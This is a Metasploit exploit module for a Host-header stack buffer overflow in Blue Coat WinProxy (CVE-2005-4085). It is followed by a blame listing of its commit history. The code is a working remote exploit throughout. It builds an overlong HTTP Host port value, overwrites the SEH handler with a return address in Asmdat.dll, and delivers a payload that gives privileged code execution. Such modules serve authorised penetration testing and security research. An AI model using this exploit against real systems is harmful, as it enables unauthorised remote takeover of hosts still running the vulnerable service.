modules/exploits/windows/proxy/bluecoat_winproxy_host.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Blue Coat WinProxy Host Header Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the Blue Coat Systems WinProxy
        service by sending a long port value for the Host header in a HTTP
        request.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-4085'],
          ['OSVDB', '22238'],
          ['BID', '16147'],
          ['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2005-01-05',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(80)
      ])

  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    sploit  = "GET / HTTP/1.1" + "\r\n"
    sploit += "Host: 127.0.0.1:"
    sploit += rand_text_english(31, payload_badchars)
    seh  = generate_seh_payload(target.ret)
    sploit[23, seh.length] = seh
    sploit += "\r\n\r\n"

    sock.put(sploit)
    sock.get_once(-1, 3)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
Code from MC 2006-01-08 06:26:30 +00:00
add more http fingerprints -- thx mc 2010-07-12 23:25:31 +00:00			`HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`
Code from MC 2006-01-08 06:26:30 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
More modules from MC 2006-09-12 05:58:09 +00:00			`'Name' => 'Blue Coat WinProxy Host Header Overflow',`
Code from MC 2006-01-08 06:26:30 +00:00			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a buffer overflow in the Blue Coat Systems WinProxy`
More modules from MC 2006-09-12 05:58:09 +00:00			`service by sending a long port value for the Host header in a HTTP`
			`request.`
Code from MC 2006-01-08 06:26:30 +00:00			`},`
			`'Author' => 'MC',`
MC asked us to place his code under MSF license 2006-06-21 18:38:40 +00:00			`'License' => MSF_LICENSE,`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'References' =>`
			`[`
Code from MC 2006-01-08 06:26:30 +00:00			`['CVE', '2005-4085'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '22238'],`
More modules from MC 2006-09-12 05:58:09 +00:00			`['BID', '16147'],`
			`['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],`
Code from MC 2006-01-08 06:26:30 +00:00			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 600,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
fix syntax errors 2006-01-08 10:38:35 +00:00			`'Targets' =>`
Code from MC 2006-01-08 06:26:30 +00:00			`[`
			`[ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll`
			`],`
			`'Privileged' => true,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2005-01-05',`
Code from MC 2006-01-08 06:26:30 +00:00			`'DefaultTarget' => 0))`

big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(80)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Code from MC 2006-01-08 06:26:30 +00:00
			`end`

			`def exploit`
			`connect`

			`print_status("Trying target #{target.name}...")`

big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`sploit = "GET / HTTP/1.1" + "\r\n"`
Code from MC 2006-01-08 06:26:30 +00:00			`sploit += "Host: 127.0.0.1:"`
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`sploit += rand_text_english(31, payload_badchars)`
Code from MC 2006-01-08 06:26:30 +00:00			`seh = generate_seh_payload(target.ret)`
			`sploit[23, seh.length] = seh`
			`sploit += "\r\n\r\n"`

			`sock.put(sploit)`
			`sock.get_once(-1, 3)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Code from MC 2006-01-08 06:26:30 +00:00			`handler`
			`disconnect`
			`end`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`end`